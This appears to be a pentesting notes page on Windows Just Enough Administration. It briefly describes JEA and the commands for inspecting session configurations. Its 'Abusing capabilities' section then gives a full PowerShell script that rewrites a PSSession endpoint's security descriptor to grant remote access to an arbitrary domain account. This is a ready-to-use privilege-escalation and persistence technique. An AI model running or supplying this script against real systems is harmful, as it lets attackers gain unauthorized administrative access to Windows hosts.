# Just Enough Administration (JEA) Just Enough Administration (JEA) is a security technology that enables delegated administration for anything managed by PowerShell. With JEA, you can: * **Reduce the number of administrators on your machines** using virtual accounts or group-managed service accounts to perform privileged actions on behalf of regular users. * **Limit what users can do** by specifying which cmdlets, functions, and external commands they can run. * **Better understand what your users are doing** with transcripts and logs that show you exactly which commands a user executed during their session. ## Viewing PSSession configuration ```powershell Get-PSSessionConfiguration ``` ![](https://1029482190-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVonnsWh96xLbzU5ncJWZ%2Fuploads%2FSL5lEq5CG82qPNyGbmPo%2Fimage.png?alt=media\&token=afd32fc9-df7e-429f-93fc-421db03531ef) ## Get the capabilities of the PSSession ```powershell Get-PSSessionCapability [Name] ``` ![](https://1029482190-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVonnsWh96xLbzU5ncJWZ%2Fuploads%2FOMCC7GQd0OZLLNIx9Tn5%2Fimage.png?alt=media\&token=ccdca0b9-2f86-4fc4-b288-1f668d42a91a) ## Abusing capabilities ### Set-PSSessionConfiguration The `Set-PSSessionConfiguration` cmdlet changes the properties of the session configurations on the local computer. With Set-PSSessionConfiguration you are able to add permission to PSSessions configurations. ```powershell # The identity to add permissions for $Identity = "domain\vanessa" # The configuration name to change permissions to (default is 'microsoft.powershell') $sessionConfigurationName = 'ITAccess' # Get the current permissions on the default endpoint $sddl = (Get-PSSessionConfiguration -Name $sessionConfigurationName).SecurityDescriptorSddl # Build the new Access Control Entry object $rights = -1610612736 # AccessAllowed $IdentitySID = ((New-Object -TypeName System.Security.Principal.NTAccount -ArgumentList $Identity).Translate( [System.Security.Principal.SecurityIdentifier])).Value $newAce = New-Object System.Security.AccessControl.CommonAce( [System.Security.AccessControl.AceFlags]::None, [System.Security.AccessControl.AceQualifier]::AccessAllowed, $rights, $IdentitySID, $false, $null ) # Prepare the RawSecurityDescriptor $rawSD = New-Object -TypeName System.Security.AccessControl.RawSecurityDescriptor -ArgumentList $sddl if ($rawSD.DiscretionaryAcl.GetEnumerator() -notcontains $newAce) { $rawSD.DiscretionaryAcl.InsertAce($rawSD.DiscretionaryAcl.Count, $newAce) } $newSDDL = $rawSD.GetSddlForm([System.Security.AccessControl.AccessControlSections]::All) # Set the PSSessionConfiguration permissions Set-PSSessionConfiguration -Name $sessionConfigurationName -SecurityDescriptorSddl $newSDDL # Verify permissions were added (Get-PSSessionConfiguration -Name $sessionConfigurationName).Permission -split ', ' ``` ## References {% embed url="" %} {% embed url="" %}